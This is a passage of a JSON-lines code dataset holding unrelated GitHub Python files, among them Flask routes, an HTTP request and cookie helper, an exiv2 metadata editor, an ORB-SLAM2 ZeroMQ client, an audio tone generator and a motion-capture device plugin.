\"PATCH\"])\n@login_required\ndef update_category(category_id):\n form = CategoryForm()\n form['csrf_token'].data = request.cookies['csrf_token']\n\n if form.validate_on_submit():\n category = Category.query.get(category_id)\n\n if category:\n if category.user_id == current_user.id:\n category.name = form.data['name']\n db.session.commit()\n return category.to_dict(), 200\n else:\n return {'errors': 'Unauthorized to update this category'}, 401\n else:\n return {'errors': 'Category not found'}, 404\n else:\n return {'errors': validation_errors_to_error_messages(form.errors)}, 400\n\n\n# DELETE A CATEGORY FROM CATEGORY ID\n@category_routes.route('/', methods=[\"DELETE\"])\n@login_required\ndef delete_category(category_id):\n category = Category.query.get(category_id)\n if category:\n if category.user_id == current_user.id:\n db.session.delete(category)\n db.session.commit()\n return {'message': 'Category deleted successfully'}, 200\n else:\n return {'errors': 'Unauthorized to delete this category'}, 401\n else:\n return {'errors': 'Category not found'}, 404\n","repo_name":"yassin30000/inventory_now","sub_path":"app/api/category_routes.py","file_name":"category_routes.py","file_ext":"py","file_size_in_byte":2965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"20286369385","text":"\"\"\"\n联网相关\n\"\"\"\n\nimport os\n\nimport requests\n\n\ndef get(url, params=None, headers=None, cookies=None, encoding='utf-8', result_type='text', need_print=True):\n \"\"\"\n 获取数据\n :param url: 地址\n :param params: 参数\n :param headers: 头\n :param cookies: cookies\n :param encoding: 编码\n :param result_type: 结果类型\n :param need_print: 是否需要打印\n :return:\n \"\"\"\n # 伪装头\n # Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36\n ua = 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6'\n if headers is None or not isinstance(headers, dict):\n headers = {\n 'User-Agent': ua\n }\n else:\n if not 'User-Agent' in headers.keys():\n headers['User-Agent'] = ua\n # 打开请求\n if need_print:\n print(\"open \" + url)\n if params is not None:\n print('params', params)\n result = requests.get(url, params=params, headers=headers, cookies=cookies)\n result.encoding = encoding\n if result_type == 'text':\n result = result.text\n elif result_type == 'json':\n result = result.json()\n if need_print:\n print(f'result is {result_type}\\n{result}')\n return result\n\n\ndef get_file(url, file_path, need_print=True, **kwargs):\n \"\"\"下载文件\"\"\"\n if need_print:\n print('下载文件 %s ,从 %s' % (file_path, url))\n dir_name = os.path.dirname(file_path)\n if not os.path.exists(dir_name):\n os.makedirs(dir_name)\n if need_print:\n print('创建目录 %s' % dir_name)\n r = requests.get(url, None, **kwargs)\n with open(file_path, 'wb') as f:\n f.write(r.content)\n if need_print:\n print('下载完成')\n\n\ndef parse_cookies_from_file(file_path, exit_if_not_exists=True):\n \"\"\"\n 从文件中解析 cookies\n :param file_path: 文件路径\n :param exit_if_not_exists:文件不存在时,是否退出\n :return:\n \"\"\"\n if not os.path.exists(file_path):\n print('cookies file not exists:', file_path)\n if exit_if_not_exists:\n exit()\n else:\n return\n with open(file_path, encoding='utf-8') as f:\n return parse_cookies(f.read())\n\n\ndef parse_cookies(cookies=''):\n \"\"\"从字符串中解析出 cookies\"\"\"\n result = dict()\n if not cookies:\n return result\n\n key_value_list = cookies.split(';')\n for key_value in key_value_list:\n key_value_pair = key_value.split('=', maxsplit=1)\n if len(key_value_pair) == 2:\n key, value = key_value_pair\n result[key.strip()] = value.strip()\n return result\n\n\ndef parse_params_from_file(file_path):\n with open(file_path, encoding='utf-8') as f:\n return parse_params(f.read())\n\n\ndef cookies_to_str(cookies):\n \"\"\"转 cookies 为字符串\"\"\"\n return ';'.join([k + '=' + v for k, v in cookies.items()])\n\n\ndef parse_params(params):\n \"\"\"\n 解析参数,从 fiddler 中抓取后直接复制\n 以 # 开头或者空行将被忽略\n \"\"\"\n data = {}\n for line in params.split('\\n'):\n if line.startswith('#'):\n continue\n if '\\t' not in line:\n continue\n key, value = line.split('\\t')\n data[key] = value\n return data\n\n\ndef handle_result(request, success_callback=None, fail_callback=None, print_result=True):\n \"\"\"处理结果\"\"\"\n result = request.json()\n if print_result:\n print(result)\n if result:\n code = result['code']\n if code == 200:\n # 成功\n data = result['data']\n if success_callback:\n success_callback(data)\n return data\n else:\n # 失败\n msg = result['msg']\n print(msg)\n if fail_callback:\n fail_callback(code, msg)\n else:\n # 结果为空\n if fail_callback:\n fail_callback(0, None)\n return None\n","repo_name":"pingfangx/pythonx","sub_path":"ToolsX/xx/netx.py","file_name":"netx.py","file_ext":"py","file_size_in_byte":4029,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"32"}
+{"seq_id":"1510032279","text":"# -*- coding: utf-8 -*-\nfrom subprocess import CalledProcessError\nfrom typing import List\n\nfrom lib import cli\nimport lib.meta_data as md\nfrom lib.config import Configuration\nfrom tests.defines import EXIV2_WARN_ERROR_CODE\n\n\nclass ExifEditor:\n\n def __init__(self, config: Configuration):\n self._config = config\n\n def get_meta_data_safe(self, path: str) -> md.MetaData:\n \"\"\"\n :raises InvalidMetaDataError if the exiv data of the file could not be parsed\n FileNotFoundError if the file could not be found\n \"\"\"\n try:\n return self.get_meta_data(path)\n except CalledProcessError:\n return md.empty()\n\n def get_meta_data(self, path: str) -> md.MetaData:\n \"\"\"\n :raises CalledProcessError if the exiv2 command terminated abnormally\n InvalidMetaDataError if the exiv data of the file could not be parsed\n FileNotFoundError if the file could not be found\n \"\"\"\n try:\n serialized = self._read_exif_field(self._config.exif_field_name, path)\n except CalledProcessError as e:\n if _is_file_not_found(e):\n raise FileNotFoundError(e)\n else:\n raise e\n return md.deserialize(serialized)\n\n def set_meta_data(self, path: str, data: md.MetaData):\n \"\"\"\n :raises CalledProcessError if the exiv2 command terminated abnormally\n FileNotFoundError if the file could not be found\n \"\"\"\n try:\n self._write_exif_field(self._config.exif_field_name, data.serialize(), path)\n except CalledProcessError as e:\n if _is_file_not_found(e):\n raise FileNotFoundError(e)\n else:\n raise e\n\n def _read_exif_field(self, field_name: str, path: str) -> str:\n base = self._build_exiv_base_command()\n command = self._build_exiv_read_command(base, field_name, path)\n std_out_lines = cli.run_cmd(command, EXIV2_WARN_ERROR_CODE)\n return \" \".join(std_out_lines[0].split()[3:])\n\n def _write_exif_field(self, field_name: str, value: str, path: str):\n base = self._build_exiv_base_command()\n command = self._build_exiv_write_command(base, field_name, value, path)\n cli.run_cmd(command)\n\n def _build_exiv_base_command(self) -> List[str]:\n cmd = ['exiv2', '-n', self._config.exiv2_charset]\n if self._config.exiv2_quiet:\n cmd.append('-q')\n return cmd\n\n def _build_exiv_read_command(self, base_command: List[str], field_name: str, path: str):\n base_command.append('-b')\n base_command.append('-K')\n base_command.append(field_name)\n base_command.append(path)\n return base_command\n\n def _build_exiv_write_command(self, base_command: List[str], field_name: str, value: str, path: str):\n if self._config.exiv2_keep_time_stamps:\n base_command.append('-k')\n base_command.append('-M')\n base_command.append('set ' + field_name + ' ' + value)\n base_command.append(path)\n return base_command\n\n\ndef _is_file_not_found(error: CalledProcessError):\n return error.returncode == 255\n","repo_name":"enguerrand/tie","sub_path":"lib/exif_editor.py","file_name":"exif_editor.py","file_ext":"py","file_size_in_byte":3249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"33978138416","text":"import logging, glob, re, click\nfrom sqlalchemy import create_engine, Column, Integer, String\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy import distinct\nfrom openpyxl import load_workbook\nfrom xlrd import *\n\n\n# configure sqlalchemy\nColumn = Column\nInteger = Integer\nString = String\nBase = declarative_base()\ncreate_engine = create_engine\nengine = create_engine('sqlite:///:memory:', echo=True)\nSession = sessionmaker(bind=engine)\n\n\nclass UserEmail(Base):\n __tablename__ = 'emails'\n\n id = Column(Integer, primary_key=True)\n user_id = Column(String(128))\n email = Column(String(320))\n\n\nBase.metadata.create_all(engine)\n\n\n# configure logging\nlogging.basicConfig(level=logging.DEBUG)\n\n\ndef find_all_reports(dir):\n # 'AllReviewsReport', 'AllReviewsbyContributorReport'\n return glob.glob('{0}/*{1}*.xls'.format(dir, 'AllReviewsReport'))\n\n\ndef get_emails(reports):\n \"\"\"Get all reports, collect all 'User ID' and 'User Email Address'\n values\"\"\"\n logging.debug(reports)\n for r in reports:\n wb = open_workbook(r)\n if 'All Reviews Report' in wb.sheet_names():\n ws = wb.sheet_by_name('All Reviews Report')\n logging.debug('cols: {0}, rows: {1}'.format(ws.ncols, ws.nrows))\n logging.debug(ws.name)\n logging.debug(ws.row(3))\n logging.debug(ws.row(3)[0].value)\n\n email_loc = [{'row': row, 'col': col}\n for col in range(ws.ncols)\n for row in range(ws.nrows)\n if ws.cell_value(row, col) == 'User Email Address']\n\n if len(email_loc) > 1:\n raise ValueError('More than one column in the All Reviews\\\n Report \"{0}\" was named \"{1}\"'.format(\n r,\n 'User Email Address'))\n\n userid_loc = [{'row': row, 'col': col}\n for col in range(ws.ncols)\n for row in range(ws.nrows)\n if ws.cell_value(row, col) == 'User ID']\n\n if len(userid_loc) > 1:\n raise ValueError('More than one column in the All Reviews\\\n Report \"{0}\" was named \"{1}\"'.format(\n r,\n 'User ID'))\n\n emails = [UserEmail(\n user_id=ws.cell_value(row, userid_loc[0]['col']),\n email=ws.cell_value(row, email_loc[0]['col']))\n for row in range(email_loc[0]['row'] + 1, ws.nrows)]\n\n logging.debug(emails)\n logging.debug(dir(emails[0]))\n\n session = Session()\n\n session.add_all(emails)\n session.commit()\n\n logging.debug(session.query(UserEmail).distinct(UserEmail.email).group_by(UserEmail.email).count())\n\n\n\ndef dedupe_emails():\n pass\n\n\ndef merge_emails():\n pass\n\n\n@click.command()\n@click.argument('dir', type=click.Path(exists=True,\n writable=True))\ndef cli(dir=\".\"):\n \"\"\"\"Simple progam that takes Bazaarvoice All Reviews Report, pulls in all\n 'User ID' and 'User Email Address' data, de-dupes it and merges it into\n the All Reviews by Contributor report, merging on\n 'User ID' and 'Reviewr ID'.\"\"\"\n logging.debug(dir)\n reports = find_all_reports(dir)\n get_emails(reports)\n\n\nif __name__ == \"__main__\":\n pass\n","repo_name":"arteedecco/all-reviews-reports-merge","sub_path":"merge.py","file_name":"merge.py","file_ext":"py","file_size_in_byte":3444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"36949143983","text":"#!/usr/bin/env python3\n\nfrom datetime import datetime, date, timedelta\nfrom utils import log_msg\nfrom bwdb import DB\nimport argparse\nimport os\nimport sys\n\n\ndef init_globals(args):\n global app_root, db\n app_path = os.path.dirname(os.path.realpath(__file__))\n app_root = os.path.realpath(os.path.join(app_path, '..'))\n\n db = DB(db=args.database)\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='Sniff interface to record metrics of IP packets.')\n\n #parser.add_argument('-c', '--config', type=str,\n # default='bwm.cfg',\n # help='configuration file')\n parser.add_argument('-d', '--database', type=str,\n default='net_mon.db',\n help='database')\n parser.add_argument('-M', '--minute_table', type=int,\n default=8,\n help='weeks to keep minute table')\n parser.add_argument('-H', '--hour_table', type=int,\n default=26,\n help='weeks to keep hour table')\n parser.add_argument('-D', '--day_table', type=int,\n default=520,\n help='weeks to keep day table')\n\n return parser.parse_args()\n\n\ndef create_tables():\n global db\n log_msg('creating tables')\n db.create_tables()\n\n\ndef rebuild_table(name=''):\n global db\n log_msg('rebuilding table: name='+str(name))\n day = db.get_min_full_day()\n db.summarize_data(name, day, compare='>=')\n log_msg('rebuilding done')\n\n\ndef archive_table(name='', weeks=''):\n global db\n day = (date.today() - timedelta(weeks=weeks)).strftime('%Y-%m-%d')\n log_msg('archiving table: name='+str(name)+', weeks='+str(weeks)+', day='+str(day))\n log_msg('archiving done')\n\n\nif __name__ == \"__main__\":\n global db\n\n log_msg('Initializing '+__file__+'...')\n\n args = parse_args()\n\n init_globals(args)\n\n rebuild_table('hour')\n rebuild_table('day')\n #archive_table('minute', args.minute_table)\n #archive_table('hour', args.hour_table)\n #archive_table('day', args.day_table)\n\n log_msg('Done.')\n\n","repo_name":"streckc/bwm","sub_path":"bin/db_maint.py","file_name":"db_maint.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"32141788491","text":"import utility\nimport resolution_equation as resolve\nimport variable_equation as veq\ndef base_function():\n user_input = utility.get_equation()\n user_input = user_input.replace(\" \", \"\")\n mode = utility.chose_mode(user_input)\n if not mode:\n result = resolve.create_result(user_input)\n else:\n result = veq.resolve_variable_equation(user_input)\n\n if result == 'Errore':\n print('Errore')\n base_function()\n else:\n print(result)\n response = input(\"Do you want to continue? Y/N \")\n control = utility.control_response(response)\n if control:\n base_function()\n else:\n print('GoodBye')","repo_name":"GvMazzon25/FirstPythonProject","sub_path":"sub_main.py","file_name":"sub_main.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"7483085639","text":"import zmq\nimport cv2\nimport numpy as np\nimport time\nimport imageio\n\n\nclass OrbSlam2Connector:\n # slam server 地址\n slam_server_address = '127.0.0.1:35696'\n # 掉线标记\n offline = True\n # 连接时最大尝试次数\n max_try_count = 10\n\n\n _SLAM_SYSTEM_NOT_READY = -1,\n _SLAM_NO_IMAGES_YET = 0,\n _SLAM_NOT_INITIALIZED = 1,\n _SLAM_OK = 2,\n _SLAM_LOST = 3\n\n def __init__(self):\n self.start_time = time.time()\n print('orbslam2_connector: init slam connect')\n self.ctx = zmq.Context()\n self.socket = self.ctx.socket(zmq.REQ)\n self.socket.setsockopt(zmq.LINGER, 0)\n self.socket.setsockopt(zmq.RCVTIMEO, 1000)\n self.socket.setsockopt(zmq.SNDTIMEO, 1000)\n # 要求如果没有建立链接,立刻返回\n self.socket.setsockopt(zmq.IMMEDIATE, True)\n # 要求应答序号要一一对应\n self.socket.setsockopt(zmq.REQ_CORRELATE, True)\n # 要求不严格轮换\n self.socket.setsockopt(zmq.REQ_RELAXED, True)\n\n self.socket.connect('tcp://%s' % self.slam_server_address)\n while self.offline:\n try:\n print('orbslam2_connector: try say hello to slam server')\n self.socket.send(bytes(np.array([-1], np.int32)))\n data = self.socket.recv()\n if len(data) == 4:\n data = int(np.frombuffer(data, np.int))\n if data == -1:\n print('orbslam2_connector: connect success')\n self.offline = False\n continue\n print('wrong data')\n except zmq.error.Again:\n print('orbslam2_connector: connect out of time, will try again')\n\n\n def get_pos(self, imgLR):\n imgLR = cv2.resize(imgLR, (1280, 360), interpolation=cv2.INTER_AREA)\n assert imgLR.shape == (360, 1280, 3)\n\n ts = time.time() - self.start_time\n ts = int(ts*1000)\n mtype = bytes(np.array([1], np.int32))\n timestamp = bytes(np.array([ts], np.int32))\n imcode = bytes(cv2.imencode('.jpg', imgLR)[1])\n imcode_len = bytes(np.array([len(imcode)], np.uint32))\n msg = mtype + timestamp + imcode_len + imcode\n\n try:\n self.socket.send(msg, copy=False)\n self.offline = False\n except zmq.error.Again:\n self.offline = True\n\n # 如果没有成功发送\n if self.offline:\n print('orbslam2_connector: found offline when send data')\n return False, None\n\n try:\n data = self.socket.recv()\n self.offline = False\n except zmq.error.Again:\n self.offline = True\n\n # 如果没有成功接收\n if self.offline:\n print('orbslam2_connector: found offline when recv data')\n return False, None\n\n if len(data) != 76:\n print('orbslam2_connector: recv data wrong')\n return False, None\n\n mtype = np.frombuffer(data[0:4], np.int32)[0]\n slam_status = np.frombuffer(data[4:8], np.int32)[0]\n rel_mat = np.frombuffer(data[8:72], np.float32).reshape([4, 4])\n restart_count = np.frombuffer(data[72:76], np.int32)[0]\n\n if mtype != 1:\n print('orbslam2_connector: recv data wrong')\n return False, None\n\n if slam_status != self._SLAM_OK:\n print('SLAM is not OK')\n return False, None\n\n return restart_count, rel_mat\n\n def get_restart_count(self):\n pass\n\n def get_status(self):\n pass\n\n\nif __name__ == '__main__':\n osc = OrbSlam2Connector()\n cam1 = imageio.get_reader('', size=(1280, 720))\n cam2 = imageio.get_reader('', size=(1280, 720))\n\n # 读取相机参数\n stereo_cam_params_file = 'stereo_cam_params_imx322_1280x720.yml'\n f = cv2.FileStorage(stereo_cam_params_file, cv2.FILE_STORAGE_READ)\n matL = f.getNode('LM').mat()\n distL = f.getNode('LD').mat()\n matR = f.getNode('RM').mat()\n distR = f.getNode('RD').mat()\n R = f.getNode('R').mat()\n T = f.getNode('T').mat()\n hw = np.array([720, 1280])\n f.release()\n\n # 设定立体矩阵\n wh = tuple(hw[::-1])\n R1, R2, P1, P2, Q, validPixROI1, validPixROI2 = \\\n cv2.stereoRectify(matL, distL, matR, distR,\n wh, R, T, flags=cv2.CALIB_ZERO_DISPARITY, alpha=-1, newImageSize=wh)\n\n mapL1, mapL2 = cv2.initUndistortRectifyMap(matL, distL, R1, P1, wh, cv2.CV_16SC2)\n mapR1, mapR2 = cv2.initUndistortRectifyMap(matR, distR, R2, P2, wh, cv2.CV_16SC2)\n\n while True:\n imgL = cam1.get_next_data()\n imgR = cam2.get_next_data()\n\n imgL = cv2.rotate(imgL, cv2.ROTATE_180)\n imgR = cv2.rotate(imgR, cv2.ROTATE_180)\n\n # 校畸\n imgL = cv2.remap(imgL, mapL1, mapL2, cv2.INTER_LINEAR)\n imgR = cv2.remap(imgR, mapR1, mapR2, cv2.INTER_LINEAR)\n # imgL = cv2.resize(imgL, (640, 360), cv2.INTER_AREA)\n # imgR = cv2.resize(imgR, (640, 360), cv2.INTER_AREA)\n\n imgLR = np.concatenate([imgL, imgR], 1)\n imgLR = cv2.resize(imgLR, (1280, 360), interpolation=cv2.INTER_AREA)\n im_show = cv2.cvtColor(imgLR, cv2.COLOR_RGB2BGR)\n cv2.imshow('view', im_show)\n s, m = osc.get_pos(imgLR)\n print(s)\n cv2.waitKey(1000//30)\n\n","repo_name":"One-sixth/smart_car","sub_path":"orbslam2_connector.py","file_name":"orbslam2_connector.py","file_ext":"py","file_size_in_byte":5360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"21457611523","text":"# import time\n# import math\n# import pyaudio\n# from cffi.backend_ctypes import xrange\n#\n#\n# class Beeper(object):\n#\n# def __init__(self, **kwargs):\n# self.bitrate = kwargs.pop('bitrate', 16000)\n# self.channels = kwargs.pop('channels', 1)\n# self._p = pyaudio.PyAudio()\n# self.stream = self._p.open(\n# format = self._p.get_format_from_width(1),\n# channels = self.channels,\n# rate = self.bitrate,\n# output = True,\n# )\n# self._queue = []\n#\n# def __enter__(self):\n# return self\n#\n# def __exit__(self, exc_type, exc_val, exc_tb):\n# self.stream.stop_stream()\n# self.stream.close()\n#\n# def tone(self, frequency, length=1000, play=False, **kwargs):\n#\n# number_of_frames = int(self.bitrate * length / 1000.)\n#\n# record = False\n# x = 0\n# y = 0\n# while 1:\n# x += 1\n# v = math.sin(x / ((self.bitrate / float(frequency)) / math.pi))\n#\n# # Find where the sin tip starts.\n# if round(v, 3) == +1:\n# record = True\n#\n# if record:\n# self._queue.append(chr(int(v * 127 + 128)))\n# y += 1\n# if y > number_of_frames and round(v, 3) == +1:\n# # Always end on the high tip of the sin wave to clips align.\n# break\n#\n# def play(self):\n# sound = ''.join(self._queue)\n# self.stream.write(sound)\n# time.sleep(0.1)\n#\n#\n# with Beeper(bitrate=88000, channels=2) as beeper:\n# i = 0\n# for f in xrange(1000, 800-1, int(round(-25/2.))):\n# i += 1\n# length = math.log(i + 1) * 250 / 2. / 2.\n# beeper.tone(frequency=f, length=int(length))\n# beeper.play()\n\nimport numpy\nimport pyaudio\nimport math\nimport random\n\n\ndef sine(frequency, length, rate):\n length = int(length * rate)\n factor = float(frequency) * (math.pi * 2) / rate\n waveform = numpy.sin(numpy.arange(length) * factor)\n return waveform\n\n\ndef play_tone(stream, frequency, length, rate=44100):\n chunks = [sine(frequency, length, rate)]\n\n chunk = numpy.concatenate(chunks) * 0.25\n\n fade = 200\n\n fade_in = numpy.arange(0., 1., 1 / fade)\n fade_out = numpy.arange(1., 0., -1 / fade)\n\n chunk[:fade] = numpy.multiply(chunk[:fade], fade_in)\n chunk[-fade:] = numpy.multiply(chunk[-fade:], fade_out)\n\n stream.write(chunk.astype(numpy.float32).tostring())\n\n\ndef bassline():\n frequency = 300\n for i in range(1000000):\n play_tone(stream, frequency, .15)\n change = random.choice([-75, -75, -10, 10, 2, 3, 100, -125])\n print (frequency)\n if frequency < 0:\n frequency = random.choice([100, 200, 250, 300])\n else:\n frequency = frequency + change\n\nif __name__ == '__main__':\n p = pyaudio.PyAudio()\n stream = p.open(format=pyaudio.paFloat32,\n channels=1, rate=44100, output=4)\n\nbassline()","repo_name":"Andrew-Garanin/AudioDigitalFiltering","sub_path":"beeper.py","file_name":"beeper.py","file_ext":"py","file_size_in_byte":3050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"71710088730","text":"\n\nimport random\n\ndef classes(room_dim, periods):\n#room_dim = list of room dimensions for each room (e.g. seat length x seat width)\n#periods = number of time periods (student has n periods (classes) a day)\n\n #determine number of students (seats) in each room\n room_size = []\n for n in room_dim: #for each set of dim in room_dim\n room_size.append(n[0] * n[1]) #size = r * c\n\n #determine total number of students, generate list of students\n num_students = sum(room_size) #total number of students\n students = range(num_students) #list of student numbers\n\n #assign students to classes\n class_list = []\n for i in range(periods): #repeats for each period\n random.shuffle(students) #shuffle list of students randomly\n\n d = 0\n for n in room_size:\n class_list.append(students[d:d + n]) #increments of students depending on room size\n d += n #keeps track of start of block, depending on size of previous room\n\n return(class_list) #class list includes lists of each class, repeated for different periods\n\nprint(classes([[1,2],[3,4]], 2)) #example\n\n###Notes:\n #Need to figure out how to implement student object with determining neighbors\n #Class list is a list, need to change back to array based on room dim to figure out neighbors\n\n","repo_name":"zackmcnulty/math_381_project","sub_path":"project-381-master/scratchwork-code/class-assignments.py","file_name":"class-assignments.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"34367335866","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n'''\n@author: Jeff Gould\n\n@description: file operation functions for black lists.\n'''\n\n#from functions import var\nfrom functions import *\n\n\n\n\ndef file_ops(df, server):\n\n named_full_log = server + full_log\n named_ip = server + ip\n named_ok = server + ok\n named_reject = server + reject\n flog = os.path.join(created_logs_dir, named_full_log)\n fip = os.path.join(created_logs_dir, named_ip)\n fok = os.path.join(created_logs_dir, named_ok)\n freject = os.path.join(created_logs_dir, named_reject)\n\n try:\n # create csv of all relevant columns\n df.to_csv(flog, index=False)\n\n # create csv of unique Ip address' and the frequency they appear\n ip_count = pd.DataFrame(columns=['IP', 'Frequency'])\n ip_count.IP = df.IP\n ip_count = ip_count.groupby('IP').agg({'Frequency': len})\n ip_count = ip_count.sort_values(by=['Frequency'], ascending=False)\n\n ip_count.to_csv(fip, index=True)\n\n # create csv of all OK request code 200\n ip_ok = df.loc[df.Code == 200]\n ip_ok.to_csv(fok, index=False)\n\n # create csv of all rejected request not code 200\n ip_rej = df.loc[df.Code != 200]\n ip_rej.to_csv(freject, index=False)\n\n logging.info(\"From file_ops() CSV's have been Created\")\n\n\n except Exception as e:\n logging.error('From file_ops()' + str(e))\n","repo_name":"Gould25/IPprojoct3113","sub_path":"functions/io_ops.py","file_name":"io_ops.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"27921404535","text":"from switchboard.config import CONFIG, Setting\nfrom switchboard.devices.device_base import Device, DeviceStatus\nfrom switchboard.devices.device_widget_base import DeviceWidget\nfrom switchboard.switchboard_logging import LOGGER\nimport switchboard.switchboard_utils as utils\n\nfrom PySide2 import QtWidgets\nfrom .thirdparty.vicon_core_api import vicon_core_api\nfrom .thirdparty.shogun_live_api import shogun_live_api\n\nimport datetime\nfrom functools import wraps\n\n\ndef unresponsive_shogun(f):\n \"\"\"\n Decorator to gracefully disconnect if a Shogun command comes back with vicon_core_api.client.RPCError\n \"\"\"\n @wraps(f)\n def wrapped(self, *args, **kwargs):\n try:\n return f(self, *args, **kwargs)\n except vicon_core_api.client.RPCError:\n self.device_qt_handler.signal_device_connect_failed.emit(self)\n return None\n except ModuleNotFoundError:\n LOGGER.error('Could not connect to Shogun because the module was not installed')\n return None\n\n return wrapped\n\n\nclass DeviceShogun(Device):\n def __init__(self, name, ip_address, **kwargs):\n self.setting_save_path = Setting(\"save_path\", \"Save Path\", \"\")\n super().__init__(name, ip_address, **kwargs)\n\n self.trigger_start = True\n self.trigger_stop = True\n\n self.client = None\n\n self._slate = 'slate'\n self._take = 1\n\n def device_settings(self):\n return super().device_settings() + [self.setting_save_path]\n\n @property\n def save_path(self):\n return self.setting_save_path.get_value()\n\n @save_path.setter\n @unresponsive_shogun\n def save_path(self, value):\n if self.setting_save_path.get_value() == value:\n return\n\n self.setting_save_path.update_value(value)\n\n self.set_capture_folder()\n\n @unresponsive_shogun\n def connect_listener(self):\n super().connect_listener()\n\n self.client = vicon_core_api.Client(self.ip_address)\n self.capture_service = shogun_live_api.CaptureServices(self.client)\n\n if self.client.connected:\n self.status = DeviceStatus.READY\n self.set_capture_folder()\n else:\n self.device_qt_handler.signal_device_connect_failed.emit(self)\n\n\n @unresponsive_shogun\n def set_slate(self, value):\n self._slate = value\n self.capture_service.set_capture_name(utils.capture_name(self._slate, self._take))\n\n @unresponsive_shogun\n def set_take(self, value):\n self._take = value\n self.capture_service.set_capture_name(utils.capture_name(self._slate, self._take))\n\n @unresponsive_shogun\n def set_capture_folder(self):\n d = datetime.date.today()\n\n save_path = d.strftime(self.save_path)\n\n # HOW TO MAKE DIR ON OTHER MACHINE\n #os.makedirs(save_path, exist_ok=True)\n\n result = self.capture_service.set_capture_folder(save_path)\n\n if result != vicon_core_api.result.Result.Ok:\n LOGGER.error(f'{self.name}: \"{save_path}\" is an invalid path. Capture Folder not set')\n\n @unresponsive_shogun\n def record_start(self, slate, take, description):\n if self.status == DeviceStatus.DISCONNECTED or not self.trigger_start:\n return\n\n self.set_slate(slate)\n self.set_take(take)\n\n result, _ = self.capture_service.start_capture()\n\n if result == vicon_core_api.result.Result.Ok:\n self.record_start_confirm(self.timecode())\n\n @unresponsive_shogun\n def record_stop(self):\n if self.status == DeviceStatus.DISCONNECTED or not self.trigger_stop:\n return\n\n result = self.capture_service.stop_capture(0)\n\n import time\n time.sleep(3)\n\n if result == vicon_core_api.result.Result.Ok:\n # TODO: THIS BLOCKS THE MAIN THREAD ON STOP. FIX THIS\n result, _, _ = self.capture_service.latest_capture_file_paths()\n # START HERE: GET PATHS OF FILES WRITTEN\n #LOGGER.debug(f'{result} {paths}')\n self.record_stop_confirm(self.timecode(), paths=None)\n\n def timecode(self):\n return '00:00:00:00'\n\n\nclass DeviceWidgetShogun(DeviceWidget):\n def __init__(self, name, device_hash, ip_address, icons, parent=None):\n super().__init__(name, device_hash, ip_address, icons, parent=parent)\n\n def _add_control_buttons(self):\n super()._add_control_buttons()\n self.trigger_start_button = self.add_control_button(':/icons/images/icon_trigger_start_disabled.png',\n icon_hover=':/icons/images/icon_trigger_start_hover.png',\n icon_disabled=':/icons/images/icon_trigger_start_disabled.png',\n icon_on=':/icons/images/icon_trigger_start.png',\n icon_hover_on=':/icons/images/icon_trigger_start_hover.png',\n icon_disabled_on=':/icons/images/icon_trigger_start_disabled.png',\n tool_tip='Trigger when recording starts',\n checkable=True, checked=True)\n\n self.trigger_stop_button = self.add_control_button(':/icons/images/icon_trigger_stop_disabled.png',\n icon_hover=':/icons/images/icon_trigger_stop_hover.png',\n icon_disabled=':/icons/images/icon_trigger_stop_disabled.png',\n icon_on=':/icons/images/icon_trigger_stop.png',\n icon_hover_on=':/icons/images/icon_trigger_stop_hover.png',\n icon_disabled_on=':/icons/images/icon_trigger_stop_disabled.png',\n tool_tip='Trigger when recording stops',\n checkable=True, checked=True)\n\n self.connect_button = self.add_control_button(':/icons/images/icon_connect.png',\n icon_hover=':/icons/images/icon_connect_hover.png',\n icon_disabled=':/icons/images/icon_connect_disabled.png',\n icon_on=':/icons/images/icon_connected.png',\n icon_hover_on=':/icons/images/icon_connected_hover.png',\n icon_disabled_on=':/icons/images/icon_connected_disabled.png',\n tool_tip='Connect/Disconnect from listener')\n\n self.trigger_start_button.clicked.connect(self.trigger_start_clicked)\n self.trigger_stop_button.clicked.connect(self.trigger_stop_clicked)\n self.connect_button.clicked.connect(self.connect_button_clicked)\n\n # Disable the buttons\n self.trigger_start_button.setDisabled(True)\n self.trigger_stop_button.setDisabled(True)\n\n def trigger_start_clicked(self):\n if self.trigger_start_button.isChecked():\n self.signal_device_widget_trigger_start_toggled.emit(self, True)\n else:\n self.signal_device_widget_trigger_start_toggled.emit(self, False)\n\n def trigger_stop_clicked(self):\n if self.trigger_stop_button.isChecked():\n self.signal_device_widget_trigger_stop_toggled.emit(self, True)\n else:\n self.signal_device_widget_trigger_stop_toggled.emit(self, False)\n\n def connect_button_clicked(self):\n if self.connect_button.isChecked():\n self._connect()\n else:\n self._disconnect()\n\n def _connect(self):\n # Make sure the button is in the correct state\n self.connect_button.setChecked(True)\n\n # Enable the buttons\n self.trigger_start_button.setDisabled(False)\n self.trigger_stop_button.setDisabled(False)\n\n # Emit Signal to Switchboard\n self.signal_device_widget_connect.emit(self)\n\n def _disconnect(self):\n # Make sure the button is in the correct state\n self.connect_button.setChecked(False)\n\n # Disable the buttons\n self.trigger_start_button.setDisabled(True)\n 